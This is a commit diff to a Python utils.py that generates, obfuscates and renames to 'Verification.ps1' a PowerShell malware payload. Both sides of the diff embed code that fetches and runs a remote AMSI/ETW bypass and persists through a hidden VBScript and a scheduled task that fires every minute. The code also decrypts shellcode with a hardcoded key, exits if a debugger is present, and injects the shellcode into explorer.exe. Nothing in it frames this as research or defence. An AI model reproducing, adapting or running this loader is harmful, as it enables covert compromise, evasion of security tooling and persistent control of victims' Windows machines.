sigyllly commited on
Commit
1e06564
·
verified ·
1 Parent(s): 0f32dbb

Update utils.py

Browse files
Files changed (1) hide show
  1. utils.py +5 -40
utils.py CHANGED
@@ -40,14 +40,14 @@ def generate_random_string(length=8):
40
 
41
  def obfuscate_powershell_script(ps1_path):
42
  try:
43
- obfuscated_file = ps1_path.replace(".ps1", "_OBF.ps1")
44
- cmd = f'pwsh -f "{OBFUSCATOR_SCRIPT}" "{ps1_path}" "{obfuscated_file}"'
45
- process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, text=True)
 
46
  stdout, stderr = process.communicate()
47
  if process.returncode != 0:
48
  raise Exception(f"Error obfuscating PowerShell script: {stderr}")
49
- if not os.path.exists(obfuscated_file):
50
- raise FileNotFoundError(f"Obfuscated file not found: {obfuscated_file}")
51
  return obfuscated_file
52
  except Exception as e:
53
  raise Exception(f"Obfuscation failed: {str(e)}")
@@ -203,33 +203,24 @@ def process_request(request):
203
  ps1_content = f'''
204
  # Download and execute the script from the provided URL
205
  iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BlackShell256/Null-AMSI/refs/heads/main/Invoke-NullAMSI.ps1)
206
-
207
  # Run the Invoke-NullAMSI command
208
  Invoke-NullAMSI
209
-
210
  Invoke-NullAMSI -etw
211
-
212
  # Define the content of the VBScript
213
  $vbsContent = @'
214
  Set objShell = CreateObject("WScript.Shell")
215
  objShell.Run "powershell -EP Bypass -File \\"C:\\ProgramData\\Installer\\Verification.ps1\\"", 0, True
216
  '@
217
-
218
  # Define the file path for the .vbs file in the desired location
219
  $vbsFilePath = "C:\\ProgramData\\Installer\\0.vbs"
220
-
221
  # Write the content to the .vbs file
222
  $vbsContent | Set-Content -Path $vbsFilePath -Encoding ASCII
223
-
224
  Write-Host "VBScript file created at: $vbsFilePath"
225
-
226
  $Action = New-ScheduledTaskAction -Execute "C:\\ProgramData\\Installer\\0.vbs"
227
  $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
228
  Register-ScheduledTask -TaskName "HiPPo Setting" -Action $Action -Trigger $Trigger -Force
229
-
230
  # Define a fixed 16-byte key for encryption (fixed key as "MyFixedEncryptionKey")
231
  $keyBytes = [System.Text.Encoding]::UTF8.GetBytes("MyFixedEncryptionKey")
232
-
233
  # Ensure the key length is 16 bytes (AES requires 16, 24, or 32 bytes)
234
  if ($keyBytes.Length -gt 16) {{
235
  $keyBytes = $keyBytes[0..15] # Trim the key to 16 bytes if it's longer
@@ -238,7 +229,6 @@ elseif ($keyBytes.Length -lt 16) {{
238
  # If the key is too short, pad it with zeros to make it 16 bytes
239
  $keyBytes = $keyBytes + (New-Object Byte[] (16 - $keyBytes.Length))
240
  }}
241
-
242
  # Function to download the encrypted binary from the server
243
  function Download-EncryptedShellcode {{
244
  param([string]$url)
@@ -246,34 +236,26 @@ function Download-EncryptedShellcode {{
246
  $response = Invoke-WebRequest -Uri $url -UseBasicParsing
247
  return $response.Content
248
  }}
249
-
250
  # Read the encrypted shellcode from a local binary file
251
  $encryptedBuf = [System.IO.File]::ReadAllBytes("C:\\ProgramData\\Installer\\{bin_file_name}")
252
-
253
  # Create an AES encryption object
254
  $aes = [System.Security.Cryptography.Aes]::Create()
255
-
256
  # Set the decryption key and initialization vector (IV)
257
  $aes.Key = $keyBytes
258
  $aes.IV = $keyBytes[0..15] # Use the first 16 bytes of the key for the IV
259
-
260
  # Create a memory stream to hold the decrypted data
261
  $memoryStream = New-Object System.IO.MemoryStream
262
  $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $aes.CreateDecryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write)
263
-
264
  # Decrypt the encrypted data into the memory stream
265
  $cryptoStream.Write($encryptedBuf, 0, $encryptedBuf.Length)
266
  $cryptoStream.Close()
267
-
268
  # Get the decrypted shellcode
269
  $buf = $memoryStream.ToArray()
270
-
271
  # Anti-debugging mechanism
272
  function IsDebuggerPresent {{
273
  $IsDebuggerPresentCode = @"
274
  using System;
275
  using System.Runtime.InteropServices;
276
-
277
  public class DebugHelper {{
278
  [DllImport(\\"kernel32.dll\\")]
279
  public static extern bool IsDebuggerPresent();
@@ -282,57 +264,44 @@ function IsDebuggerPresent {{
282
  $debugHelper = Add-Type -TypeDefinition $IsDebuggerPresentCode -PassThru
283
  return $debugHelper::IsDebuggerPresent()
284
  }}
285
-
286
  if (IsDebuggerPresent) {{
287
  Write-Host "Debugger detected. Exiting."
288
  exit
289
  }}
290
-
291
  # Inject shellcode into a target process (example: explorer.exe)
292
  $Win32APICode = @"
293
  using System;
294
  using System.Runtime.InteropServices;
295
-
296
  public class Win32API {{
297
  [DllImport(\\"kernel32.dll\\", SetLastError = true, ExactSpelling = true)]
298
  public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
299
-
300
  [DllImport(\\"kernel32.dll\\", SetLastError = true)]
301
  public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
302
-
303
  [DllImport(\\"kernel32.dll\\", SetLastError = true)]
304
  public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out IntPtr lpThreadId);
305
-
306
  [DllImport(\\"kernel32.dll\\", SetLastError = true)]
307
  public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
308
-
309
  [DllImport(\\"kernel32.dll\\", SetLastError = true)]
310
  [return: MarshalAs(UnmanagedType.Bool)]
311
  public static extern bool CloseHandle(IntPtr hObject);
312
  }}
313
  "@
314
  $win32api = Add-Type -TypeDefinition $Win32APICode -PassThru
315
-
316
  # Target process (explorer.exe) injection
317
  $targetProcess = Get-Process explorer | Select-Object -First 1
318
  $processHandle = $win32api::OpenProcess(0x1F0FFF, $false, $targetProcess.Id)
319
-
320
  # Allocate memory in the target process
321
  $size = 0x1000
322
  if ($buf.Length -gt $size) {{ $size = $buf.Length }}
323
  $remoteMemory = $win32api::VirtualAllocEx($processHandle, [IntPtr]::Zero, $size, 0x3000, 0x40)
324
-
325
  # Write the shellcode into the allocated memory
326
  $bytesWritten = [IntPtr]::Zero
327
  $win32api::WriteProcessMemory($processHandle, $remoteMemory, $buf, $buf.Length, [ref]$bytesWritten)
328
-
329
  # Create a remote thread to execute the shellcode
330
  $threadId = [IntPtr]::Zero
331
  $win32api::CreateRemoteThread($processHandle, [IntPtr]::Zero, 0, $remoteMemory, [IntPtr]::Zero, 0, [ref]$threadId)
332
-
333
  # Close the process handle
334
  $win32api::CloseHandle($processHandle)
335
-
336
  Write-Host "Shellcode injection completed successfully."
337
  '''
338
  ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
@@ -342,10 +311,6 @@ Write-Host "Shellcode injection completed successfully."
342
  # Obfuscate the PowerShell script
343
  obfuscated_ps1_path = obfuscate_powershell_script(ps1_path)
344
 
345
- # Verify that the obfuscated file exists before renaming
346
- if not os.path.exists(obfuscated_ps1_path):
347
- raise FileNotFoundError(f"Obfuscated file not found: {obfuscated_ps1_path}")
348
-
349
  # Rename the obfuscated file to Verification.ps1
350
  verification_ps1_path = os.path.join(temp_dir, "Verification.ps1")
351
  os.rename(obfuscated_ps1_path, verification_ps1_path)
 
40
 
41
  def obfuscate_powershell_script(ps1_path):
42
  try:
43
+ cmd = f'pwsh -f "{OBFUSCATOR_SCRIPT}"'
44
+ process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, text=True)
45
+ process.stdin.write(f"{ps1_path}\n")
46
+ process.stdin.flush()
47
  stdout, stderr = process.communicate()
48
  if process.returncode != 0:
49
  raise Exception(f"Error obfuscating PowerShell script: {stderr}")
50
+ obfuscated_file = ps1_path.replace(".ps1", "_OBF.ps1")
 
51
  return obfuscated_file
52
  except Exception as e:
53
  raise Exception(f"Obfuscation failed: {str(e)}")
 
203
  ps1_content = f'''
204
  # Download and execute the script from the provided URL
205
  iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BlackShell256/Null-AMSI/refs/heads/main/Invoke-NullAMSI.ps1)
 
206
  # Run the Invoke-NullAMSI command
207
  Invoke-NullAMSI
 
208
  Invoke-NullAMSI -etw
 
209
  # Define the content of the VBScript
210
  $vbsContent = @'
211
  Set objShell = CreateObject("WScript.Shell")
212
  objShell.Run "powershell -EP Bypass -File \\"C:\\ProgramData\\Installer\\Verification.ps1\\"", 0, True
213
  '@
 
214
  # Define the file path for the .vbs file in the desired location
215
  $vbsFilePath = "C:\\ProgramData\\Installer\\0.vbs"
 
216
  # Write the content to the .vbs file
217
  $vbsContent | Set-Content -Path $vbsFilePath -Encoding ASCII
 
218
  Write-Host "VBScript file created at: $vbsFilePath"
 
219
  $Action = New-ScheduledTaskAction -Execute "C:\\ProgramData\\Installer\\0.vbs"
220
  $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
221
  Register-ScheduledTask -TaskName "HiPPo Setting" -Action $Action -Trigger $Trigger -Force
 
222
  # Define a fixed 16-byte key for encryption (fixed key as "MyFixedEncryptionKey")
223
  $keyBytes = [System.Text.Encoding]::UTF8.GetBytes("MyFixedEncryptionKey")
 
224
  # Ensure the key length is 16 bytes (AES requires 16, 24, or 32 bytes)
225
  if ($keyBytes.Length -gt 16) {{
226
  $keyBytes = $keyBytes[0..15] # Trim the key to 16 bytes if it's longer
 
229
  # If the key is too short, pad it with zeros to make it 16 bytes
230
  $keyBytes = $keyBytes + (New-Object Byte[] (16 - $keyBytes.Length))
231
  }}
 
232
  # Function to download the encrypted binary from the server
233
  function Download-EncryptedShellcode {{
234
  param([string]$url)
 
236
  $response = Invoke-WebRequest -Uri $url -UseBasicParsing
237
  return $response.Content
238
  }}
 
239
  # Read the encrypted shellcode from a local binary file
240
  $encryptedBuf = [System.IO.File]::ReadAllBytes("C:\\ProgramData\\Installer\\{bin_file_name}")
 
241
  # Create an AES encryption object
242
  $aes = [System.Security.Cryptography.Aes]::Create()
 
243
  # Set the decryption key and initialization vector (IV)
244
  $aes.Key = $keyBytes
245
  $aes.IV = $keyBytes[0..15] # Use the first 16 bytes of the key for the IV
 
246
  # Create a memory stream to hold the decrypted data
247
  $memoryStream = New-Object System.IO.MemoryStream
248
  $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $aes.CreateDecryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write)
 
249
  # Decrypt the encrypted data into the memory stream
250
  $cryptoStream.Write($encryptedBuf, 0, $encryptedBuf.Length)
251
  $cryptoStream.Close()
 
252
  # Get the decrypted shellcode
253
  $buf = $memoryStream.ToArray()
 
254
  # Anti-debugging mechanism
255
  function IsDebuggerPresent {{
256
  $IsDebuggerPresentCode = @"
257
  using System;
258
  using System.Runtime.InteropServices;
 
259
  public class DebugHelper {{
260
  [DllImport(\\"kernel32.dll\\")]
261
  public static extern bool IsDebuggerPresent();
 
264
  $debugHelper = Add-Type -TypeDefinition $IsDebuggerPresentCode -PassThru
265
  return $debugHelper::IsDebuggerPresent()
266
  }}
 
267
  if (IsDebuggerPresent) {{
268
  Write-Host "Debugger detected. Exiting."
269
  exit
270
  }}
 
271
  # Inject shellcode into a target process (example: explorer.exe)
272
  $Win32APICode = @"
273
  using System;
274
  using System.Runtime.InteropServices;
 
275
  public class Win32API {{
276
  [DllImport(\\"kernel32.dll\\", SetLastError = true, ExactSpelling = true)]
277
  public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
 
278
  [DllImport(\\"kernel32.dll\\", SetLastError = true)]
279
  public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
 
280
  [DllImport(\\"kernel32.dll\\", SetLastError = true)]
281
  public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out IntPtr lpThreadId);
 
282
  [DllImport(\\"kernel32.dll\\", SetLastError = true)]
283
  public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
 
284
  [DllImport(\\"kernel32.dll\\", SetLastError = true)]
285
  [return: MarshalAs(UnmanagedType.Bool)]
286
  public static extern bool CloseHandle(IntPtr hObject);
287
  }}
288
  "@
289
  $win32api = Add-Type -TypeDefinition $Win32APICode -PassThru
 
290
  # Target process (explorer.exe) injection
291
  $targetProcess = Get-Process explorer | Select-Object -First 1
292
  $processHandle = $win32api::OpenProcess(0x1F0FFF, $false, $targetProcess.Id)
 
293
  # Allocate memory in the target process
294
  $size = 0x1000
295
  if ($buf.Length -gt $size) {{ $size = $buf.Length }}
296
  $remoteMemory = $win32api::VirtualAllocEx($processHandle, [IntPtr]::Zero, $size, 0x3000, 0x40)
 
297
  # Write the shellcode into the allocated memory
298
  $bytesWritten = [IntPtr]::Zero
299
  $win32api::WriteProcessMemory($processHandle, $remoteMemory, $buf, $buf.Length, [ref]$bytesWritten)
 
300
  # Create a remote thread to execute the shellcode
301
  $threadId = [IntPtr]::Zero
302
  $win32api::CreateRemoteThread($processHandle, [IntPtr]::Zero, 0, $remoteMemory, [IntPtr]::Zero, 0, [ref]$threadId)
 
303
  # Close the process handle
304
  $win32api::CloseHandle($processHandle)
 
305
  Write-Host "Shellcode injection completed successfully."
306
  '''
307
  ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
 
311
  # Obfuscate the PowerShell script
312
  obfuscated_ps1_path = obfuscate_powershell_script(ps1_path)
313
 
 
 
 
 
314
  # Rename the obfuscated file to Verification.ps1
315
  verification_ps1_path = os.path.join(temp_dir, "Verification.ps1")
316
  os.rename(obfuscated_ps1_path, verification_ps1_path)